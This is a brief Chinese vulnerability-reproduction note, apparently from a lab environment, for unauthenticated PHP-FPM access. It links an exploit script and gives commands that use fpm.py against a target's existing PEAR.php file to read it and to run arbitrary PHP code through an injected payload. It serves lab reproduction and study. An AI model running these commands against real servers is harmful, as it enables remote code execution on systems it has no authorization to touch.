漏洞复现
exp:https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75
exp需要访问原本就存在的PHP文件,才能够执行任意命令
查看PHP文件内容:
python fpm.py your-ip /usr/local/lib/php/PEAR.php
执行任意命令:
python fpm.py your-ip /usr/local/lib/php/PEAR.php -c '<?php echo `pwd`; ?>'